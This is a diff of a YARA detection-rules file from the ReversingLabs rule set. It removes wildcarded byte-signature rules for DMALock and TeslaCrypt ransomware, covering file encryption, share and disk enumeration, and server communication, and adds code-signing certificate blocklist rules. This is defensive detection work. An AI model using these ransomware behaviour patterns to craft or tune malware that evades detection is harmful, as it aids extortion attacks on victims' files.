-            C4 ?? 85 C0 75 ?? B3 ?? 6A ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD
-            E8 ?? ?? ?? ?? 8B E5 5D C3 8D 95 ?? ?? ?? ?? 52 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 72 ?? C6
-            85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 51 52 68
-        }
-		$dmalock_v1_enum_shares_and_discs_type_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 8B 5D ?? 56 57
-            8D 8D ?? ?? ?? ?? 51 50 6A ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 95 ?? ?? ??
-            ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 85 FF 75 ?? 50 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ??
-            ?? 8D A4 24 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 57 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 76 ?? 8D 77 ?? EB ?? 8D A4 24
-            ?? ?? ?? ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51
-            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0E 8B C1 83 C4 ?? 8D 78 ?? 8B FF 8A 10 40 84
-            D2 75 ?? 2B C7 50 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 06 83 C4 ?? 8D 50 ?? 90
-            8A 08 40 84 C9 75 ?? 2B C2 6A ?? 8D 84 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B 4D ?? 83 C4 ?? 51 8D 95 ?? ?? ?? ?? 53 52 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83
-            C4 ?? 8B 46 ?? 83 E0 ?? 3C ?? 75 ?? 8B 4D ?? 51 53 8D 56 ?? 52 E8 ?? ?? ?? ?? 85 C0
-            75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 40 83 C6 ?? 89 85 ??
-            ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8B 4D ?? F7 D8 5F 1B C0 5E 33 CD 40 5B E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$dmalock_v1_enum_shares_and_discs_type_3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 6A ?? 51 8B D8 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? BF ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? F7 C3 ?? ?? ?? ?? 76 ?? 57 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B F0 56 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 74 ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8B
-            55 ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 D1 EB
-            FF 8D ?? ?? ?? ?? 75 ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$dmalock_v2_enum_logical_disks = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 33 DB 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE 4D ?? 51 8D 95 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ??
-            ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
-            B0 ?? 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 8A C3 33 CD 5B E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$dmalock_v4_remote_server_communication = {
-            85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 0F
-            87 ?? ?? ?? ?? FF 24 9D ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83
-            C4 ?? B0 ?? C3 8B 4E ?? 8B 56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0
-            ?? C3 8B 46 ?? 8B 4E ?? 50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B
-            56 ?? 8B 46 ?? 52 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 4E ?? 8B
-            56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ?? 8B
-            56 ?? 50 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ??
-            50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 32 C0 C3
-        }
-		$dmalock_v4_encrypt_file_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
-            ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56
-            32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 56
-            6A ?? 89 45 ?? 89 45 ?? 66 89 45 ?? 8D 45 ?? 6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ??
-            8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? 6A ?? 57 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$dmalock_v4_encrypt_file_2 = {
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ??
-            ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B
-            D8 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? ?? 85 F6 74
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46 ?? 85 C0 74 ?? 8B 75 ?? B9 ?? ?? ??
-            ?? 8B F8 F3 A5 66 A5 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46
-            ?? EB ?? 33 F6 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 7E ?? 57 89 35 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B C6 E8 ?? ?? ?? ?? 84 C0 74 ?? 8B 4E ?? 8B 17 56 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? C6 46 ?? ?? 8B B5 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 56 6A ?? 6A ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 56 52 6A ?? 53 E8 ?? ?? ?? ?? 8B 45 ??
-            8B 8D ?? ?? ?? ?? 56 50 6A ?? 51 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33
-            CD B8 ?? ?? ?? ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Software Plugin Ltd." and pe.signatures [ i ] . serial == "1e:fe:65" and 1063224491 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0Af7E2B6A3Deb99291Dcaf66 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f9c18796-995e-58f8-8406-9adcad143ae7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14476-L14492"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "270b5655a0f54abceb520eaca714ed4f6d4de720883e2759acd5bb2f027dfd2b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_2 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_3 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 and $dmalock_v2_enum_logical_disks ) or ( $dmalock_v4_encrypt_file_1 and $dmalock_v4_encrypt_file_2 and $dmalock_v4_remote_server_communication and $dmalock_v2_enum_logical_disks )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "0a:f7:e2:b6:a3:de:b9:92:91:dc:af:66" and 1474523112 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Teslacrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_45E27C4Dfa5E6175566A13B1B6Ddf3F5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Teslacrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "842dae76-573c-564d-b658-ccdda451df21"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "b4ab6397-5e15-5eb3-9f5d-658c5e3a7e3d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Teslacrypt.yara#L1-L665"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cc054be68d833d9f29a4ebd1c202922881b0d22a2605edc7def1048dc08f6325"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14494-L14510"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9bcbb84207984b259463482f094bf0f3815f0d74317b6b864dab44769ff5e7e8"
 		score = 75
-		quality = 65
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		quality = 90
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Teslacrypt"
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$file_search_0_3_1_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B5 01 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? 0F 85 89 01 00 00 F6 44 24 ?? ?? 0F 84 D2 00 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
-            1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84
-            29 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83
-            C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 EA 00 00 00 56 8D 94 24 ?? ?? ?? ?? 68
-        }
-		$file_search_0_3_1_2 = {
-            52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 7E FE FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ??
-            50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ??
-            85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB
-            11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ??
-            0F 84 6A FE FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$file_search_0_3_3_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 57 02 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? 0F 85 2B 02 00 00 F6 44 24 ?? ?? 0F 84 74 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
-            1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84
-            CB 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83
-            C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 8C 01 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            52 E8 ?? ?? ?? ?? 8B C6 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
-        }
-		$file_search_0_3_3_2 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51
-            ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E8 00 00 00 8D 8C 24 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB
-            05 1B C0 83 D8 ?? 85 C0 0F 84 A9 00 00 00 8D 84 24 ?? ?? ?? ?? 57 50 E8 DC FD FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44
-            24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ??
-            ?? EB 11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ??
-            ?? ?? 0F 84 C8 FD FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$file_search_0_3_4a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 57 50 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 57 51 66 89 BC
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F
-            84 99 02 00 00 8B BC 24 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 76 02 00 00 F6 44 24 ?? ?? 0F 84 6B
-            01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 02 00 00 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 1E 02 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D
-            94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            0F 84 AF 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 92 01 00 00 8D 94 24 ?? ??
-            ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 75 01 00 00 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8
-        }
-		$file_search_0_3_4a_2 = {
-            83 C4 ?? 85 C0 0F 84 58 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3B 01
-            00 00 8D 94 24 ?? ?? ?? ?? 57 52 E8 10 FE FF FF 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? E9 E7 00 00 00 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 79 8D 54
-            24 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 7F 00 00 00 8D 44 24 ?? 50 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 63 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 47 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 35 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB 23 8D
-            4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 10 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24
-            ?? 50 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ?? 0F 84 7D FD FF FF 55 FF 15 ?? ?? ?? ?? 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D
-            33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$file_search_0_3_5a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A
-            ?? 51 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ??
